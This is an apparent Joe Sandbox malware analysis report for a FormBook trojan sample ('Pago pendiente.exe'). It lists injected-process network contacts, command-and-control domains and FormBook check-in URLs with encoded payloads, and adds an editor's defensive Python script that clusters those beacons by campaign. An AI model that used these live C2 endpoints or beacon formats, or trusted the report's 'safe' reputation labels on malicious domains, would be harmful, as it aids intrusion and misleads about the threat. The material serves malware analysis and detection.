https://word.office.comon | explorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.eternalknot1008.com/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.signomo.com/gs12/www.urxetqt.com | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.y2llvq.vip/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eternalknot1008.comReferer: | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hjgd.xyz | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.k2securityhn.com/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.actnowgreen.com/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000006.00000002.4454283275.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2029302609.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/DataSet1.xsd | Pago pendiente.exe | false | Avira URL Cloud: safe | unknown
http://www.actnowgreen.com | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urxetqt.com/gs12/www.hjgd.xyz | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
http://www.tronbank.club/gs12/ | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.signomo.comReferer: | explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.y2llvq.vipexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.umastyle.clubReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zgcple.info/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://excel.office.comexplorer.exe, 00000006.00000003.3097001927.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4449891914.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097220261.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009BB1000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.microexplorer.exe, 00000006.00000000.2024943669.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447767327.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447077896.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.51win.ink/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tronbank.club/gs12/www.signomo.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.51win.inkReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sports565.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.airzf.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.eternalknot1008.com/gs12/www.zgcple.infoexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lolabeautystudios.com/gs12/www.y2llvq.vipexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.zgcple.infoReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.lolabeautystudios.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.airzf.com/gs12/www.actnowgreen.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.actnowgreen.com/gs12/www.udin88b.usexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.hjgd.xyz/gs12/www.airzf.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.y2llvq.vipReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.k2securityhn.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sports565.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000000.2029302609.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://www.umastyle.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePago pendiente.exe, 00000000.00000002.2008580882.00000000034E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.eternalknot1008.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.airzf.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.y2llvq.vip/gs12/www.51win.inkexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.hjgd.xyzReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wns.windows.com/)sexplorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.signomo.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.urxetqt.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                http://www.wonderdread.cloud/gs12/www.umastyle.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.udin88b.usexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.51win.inkexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.umastyle.club/gs12/www.sports565.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.51win.ink/gs12/ch_cfexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.lolabeautystudios.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.lolabeautystudios.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.udin88b.usReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.zgcple.info/gs12/www.k2securityhn.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://outlook.comexplorer.exe, 00000006.00000002.4449957042.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096490276.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.wonderdread.cloud/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.wonderdread.cloudexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.cloudflare.com/5xx-error-landingexplorer.exe, 00000006.00000002.4459657953.000000001136F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.00000000051EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    high
                                                    http://www.udin88b.us/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.urxetqt.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tronbank.clubReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.hjgd.xyz/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.umastyle.club/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.zgcple.infoexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tronbank.clubexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.2020705290.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.urxetqt.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      unknown
                                                      http://www.wonderdread.cloudReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.airzf.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.udin88b.us/gs12/www.eternalknot1008.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.signomo.com/gs12/explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.k2securityhn.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.msn.com/explorer.exe, 00000006.00000000.2026275554.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.sports565.com/gs12/www.lolabeautystudios.comexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.actnowgreen.comReferer:explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.vexplorer.exe, 00000006.00000002.4443289671.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.k2securityhn.com/gs12/www.wonderdread.cloudexplorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
IP               Domain             Country        ASN     ASN Name                            Malicious
154.12.38.29     www.airzf.com      United States  54133   UNMETEREDCA                         false
3.33.130.190     signomo.com        United States  8987    AMAZONEXPANSIONGB                   true
103.224.212.216  www.tronbank.club  Australia      133618  TRELLIAN-AS-APTrellianPtyLimitedAU  true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1430321
Start date and time: 2024-04-23 14:19:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Pago pendiente.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@11/6@12/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 172
• Number of non-executed functions: 309
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Pago pendiente.exe
Time      Type             Description
14:19:55  API Interceptor  1x Sleep call for process: Pago pendiente.exe modified
14:19:56  API Interceptor  12x Sleep call for process: powershell.exe modified
14:19:59  API Interceptor  8085073x Sleep call for process: explorer.exe modified
14:20:41  API Interceptor  7205021x Sleep call for process: control.exe modified
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3.33.130.190Ordem de Compra.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.clashfitness.com/fs83/?_dnp2=g0Dl2hfPZh6&KtxD=0r3jDZR2mPSB2mr946YdutOlopl9YgvkC/gHB3J+dtDrerkWCLnITmSv5p2p041JRVShddibDw==
                                                        Bank Details.pdf.exeGet hashmaliciousFormBookBrowse
                                                        • www.alhandco.com/fs83/?GjRhvF6=8rohnvDF5kh+o1NOYRPm2/cn9W3SragyI9glmqEAkYsjGSQIG2JjI1Ywqg+/wlY5v9Rz&Il=X2JX02P0Mnd84pd
                                                        Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                                        • www.lunazone.us/m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H
                                                        Ola#U011fan#U00fcst#U00fc #U00f6deme.exeGet hashmaliciousFormBookBrowse
                                                        • www.freefoodpro.com/gs12/?VR-X4=9eJw5ls0sJOkjLnVlwyFSnWFW6kUG96xBpPIo3HMQVuilUjgGvwDzxuS9bT5n/+36fQt9vxZ3A==&LXedb=UfF4Xry
Match | Associated Sample Name / URL | Detection | Threat Name | Context
(continued) | 7pBip8QD2u.exe | malicious | FormBook | www.8xb799.com/ki21/?Dtx=Ko9jSs5WVFqqq/VgTiR1hm4Th6P16VS6CeAJ/BZkX5NFlELD5JXvS8VenJXixdPNAoDe&blA=Od5t-r3p0
(continued) | narud#U017ebenicu 0BH2024.exe | malicious | FormBook | www.xn--diseafacil-w9a.com/dd20/?GFQL1=q8DVLSKZmumKeAfNfIEwqgwWoiHwoxutlGocD5zBD9wPsfuE5ife8r9vkXvW1Q745XA6&lf20=sBdp88JXEddd9
(continued) | HrONRdSlYf.exe | malicious | Unknown | thinkboard.net/index.php
(continued) | hj3YCvtlg7.exe | malicious | FormBook | www.ethicai.pro/vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP
(continued) | gRDcPJpgMQ.exe | malicious | FormBook | www.ariostech.com/fs83/?F0G=4hOdKx&AZ=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVQJQXKev3+LO
(continued) | ZNGMn9IDJX.exe | malicious | FormBook | www.ariostech.com/fs83/?GfFd7pI0=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVT9AHfqpqryJ&Ezu=UXItOX1x-th4
103.224.212.216 | CERTIFICATE OF REGISTRY_pdf.exe | malicious | FormBook, GuLoader | www.e1fbar.com/oa21/?tXaPZx=XPLXzXIP&1bxXAd=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn
103.224.212.216 | VIMEKSIM PO# 1330 Confirmation_pdf.exe | malicious | FormBook, GuLoader | www.e1fbar.com/oa21/?9rEx=aH40RveXvfWx_dgP&hp0tAn_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn
103.224.212.216 | Purchase_Order_PA056223.pdf.exe | malicious | FormBook, GuLoader | www.e1fbar.com/oa21/?u6al_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn&BR-pk=vVwhfNlhQdJd
103.224.212.216 | PO#CR21-1178321.exe | malicious | FormBook | www.biddrivego.com/bp31/?M2Mp=BbjH9j20bVAPFLnP&mzuH8JU=Z5L6swpfWqm+04QiTY4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSEx1RyQK8q6j
103.224.212.216 | UgHXEfw1uL.exe | malicious | FormBook | www.biddrivego.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=Z5L6sworWKjOpINWPo4O7LxjOb13jHcZOV7UNDMxrK5jvMEQfzuz5GlsSHRPBjwymNbk
103.224.212.216 | mj0mo2csOj.exe | malicious | FormBook, NSISDropper | www.zg9tywlubmftzw5ldzmzmzk.com/ju29/?XBZ=eJVNysr8g7jhGVJM6WKlDkK99NL0wUK/QDlsL7Lj6NSFlz2tZV6Lob/sU+3h/ZZd2NS5&EhA830=9rMdY83P9Lb
103.224.212.216 | SecuriteInfo.com.FileRepMalware.16340.31219.exe | malicious | FormBook, NSISDropper | www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q
103.224.212.216 | Audit_Confirmation_pdf.exe | malicious | FormBook | www.subpaylive.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=W9llMiursJsou6ZkRs5LJBT9oyR3M4qDKVATUZCUeHXMX1W+AU0MWBNIglF3FqFvpfwF
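The check-in URLs in this table share one shape: a host, a four-character path segment that names the campaign (ki21, dd20, vr01, fs83, oa21, bp31, ju29, ls02), and a query with one short decoy parameter and one long parameter that carries the sample's encoded check-in data. The three samples on www.e1fbar.com/oa21/ send a byte-identical long value and the two on www.ariostech.com/fs83/ share a long common prefix, so the long value is a usable key for grouping analyses of one campaign. The script below is an added example by this editor, not Joe Sandbox tooling: it pulls such URLs out of a URL list (here the rows above, copied in as constructed input), clusters them by host and campaign path, and measures the shared prefix inside each cluster. The four-alphanumeric path shape and the 32-character payload threshold are assumptions read off this table, not taken from a FormBook specification.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample input: check-in URLs copied from the Context table above,
# plus one non-FormBook URL from the same table as a negative case.
SAMPLE_URLS = [
    "www.8xb799.com/ki21/?Dtx=Ko9jSs5WVFqqq/VgTiR1hm4Th6P16VS6CeAJ/BZkX5NFlELD5JXvS8VenJXixdPNAoDe&blA=Od5t-r3p0",
    "thinkboard.net/index.php",
    "www.ariostech.com/fs83/?F0G=4hOdKx&AZ=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVQJQXKev3+LO",
    "www.ariostech.com/fs83/?GfFd7pI0=3ChPj8JLOBLXkYe8cMyTJ8P+kXe5+bBV1zWVXcnPGe4VycyNkxE6Q2OXVT9AHfqpqryJ&Ezu=UXItOX1x-th4",
    "www.e1fbar.com/oa21/?tXaPZx=XPLXzXIP&1bxXAd=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn",
    "www.e1fbar.com/oa21/?9rEx=aH40RveXvfWx_dgP&hp0tAn_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn",
    "www.e1fbar.com/oa21/?u6al_=XYSbi3SyrI95U5CuiBg430TM/ha3cud03mrmY59cPnoBpjdvOPViRlxBrAvcK2xLKynn&BR-pk=vVwhfNlhQdJd",
]

# Assumed shape of the campaign path (inferred from the table, not from a
# FormBook specification): "/" + four lowercase alphanumerics + "/".
CAMPAIGN_PATH = re.compile(r"^/([a-z0-9]{4})/$")
# Assumption: the check-in value is far longer than the decoy token (longest
# decoy in the table is 16 characters, shortest check-in value is 68).
MIN_PAYLOAD_LEN = 32


def parse_checkin(url):
    """Return {"host", "campaign", "payload"} for a FormBook-style URL, else None."""
    if "://" not in url:
        url = "http://" + url  # the report lists hosts without a scheme
    parts = urlsplit(url)
    m = CAMPAIGN_PATH.match(parts.path)
    if not m or not parts.query:
        return None
    # Split the query by hand: parse_qs would turn base64 '+' into spaces and
    # strip the trailing '=' padding some of these values carry.
    params = [kv.partition("=") for kv in parts.query.split("&")]
    _, _, payload = max(params, key=lambda kv: len(kv[2]))
    if len(payload) < MIN_PAYLOAD_LEN:
        return None
    return {"host": parts.hostname, "campaign": m.group(1), "payload": payload}


def cluster_by_campaign(urls):
    """Group check-in payloads by (host, campaign path)."""
    clusters = defaultdict(list)
    for url in urls:
        hit = parse_checkin(url)
        if hit:
            clusters[(hit["host"], hit["campaign"])].append(hit["payload"])
    return dict(clusters)


def common_prefix_len(values):
    """Length of the prefix shared by every value (0 for an empty list)."""
    if not values:
        return 0
    shortest = min(values, key=len)
    n = 0
    while n < len(shortest) and all(v[n] == shortest[n] for v in values):
        n += 1
    return n


if __name__ == "__main__":
    for (host, campaign), payloads in sorted(cluster_by_campaign(SAMPLE_URLS).items()):
        print(f"{host}/{campaign}/  samples={len(payloads)}  "
              f"shared_prefix={common_prefix_len(payloads)}/{len(payloads[0])}")
```

Run against a proxy log or a pile of sandbox reports, the (host, campaign) key groups beacons to one C2 path, and a high shared-prefix ratio inside a cluster says the same victim record was sent, which is what you expect from repeated sandbox runs of one campaign and not from a real victim population.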
Match | Associated Sample Name / URL | Detection | Threat Name | Context
parkingpage.namecheap.com | PO0423024.exe | malicious | FormBook | 91.195.240.19
parkingpage.namecheap.com | PO0423023.exe | malicious | FormBook | 91.195.240.19
parkingpage.namecheap.com | INQ No.KP-50-000-PS-IN-INQ-0027.exe | malicious | FormBook | 91.195.240.19
parkingpage.namecheap.com | Ordine_doc_419024001904.bat | malicious | FormBook, GuLoader | 91.195.240.19
parkingpage.namecheap.com | PO_La-Tanerie04180240124.vbs | malicious | FormBook, GuLoader | 91.195.240.19
parkingpage.namecheap.com | PO_La-Tanerie04180240124.bat | malicious | FormBook, GuLoader | 91.195.240.19
parkingpage.namecheap.com | Arrival Notice.vbs | malicious | FormBook, GuLoader | 91.195.240.19
parkingpage.namecheap.com | NEW-ORDER_pdf.exe | malicious | FormBook | 91.195.240.19
parkingpage.namecheap.com | 202404153836038.EXE.exe | malicious | FormBook, GuLoader | 91.195.240.19
parkingpage.namecheap.com | PO# ROSIT#U00a0MR2309040.exe | malicious | FormBook, GuLoader | 91.195.240.19
www.udin88b.us | Purchase Order.exe | malicious | FormBook | 154.83.2.141
shops.myshopify.com | SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | DOC 331-100920-00.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | DOC 331-100920-00.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | narud#U017ebenicu 0BH2024.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | MT103 Remittance.vbs | malicious | FormBook | 23.227.38.74
shops.myshopify.com | http://sellugsk.live | malicious | Unknown | 23.227.38.74
shops.myshopify.com | Purchase Order#44231.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | UAyH98ukuA.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | ZNGMn9IDJX.exe | malicious | FormBook | 23.227.38.74
shops.myshopify.com | 5AmzSYESuY.exe | malicious | FormBook | 23.227.38.74

parkingpage.namecheap.com and shops.myshopify.com are shared hosting endpoints (a registrar's domain-parking page and Shopify's storefront front end), so overlap on them reflects FormBook's habit of walking a list of decoy and parked domains alongside its real C2 rather than shared attacker infrastructure; www.udin88b.us is the only domain match here worth pivoting on.
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZONEXPANSIONGB | Ordem de Compra.pdf.exe | malicious | FormBook | 3.33.130.190
AMAZONEXPANSIONGB | https://22apmic22.z13.web.core.windows.net/ | malicious | TechSupportScam | 52.223.40.198
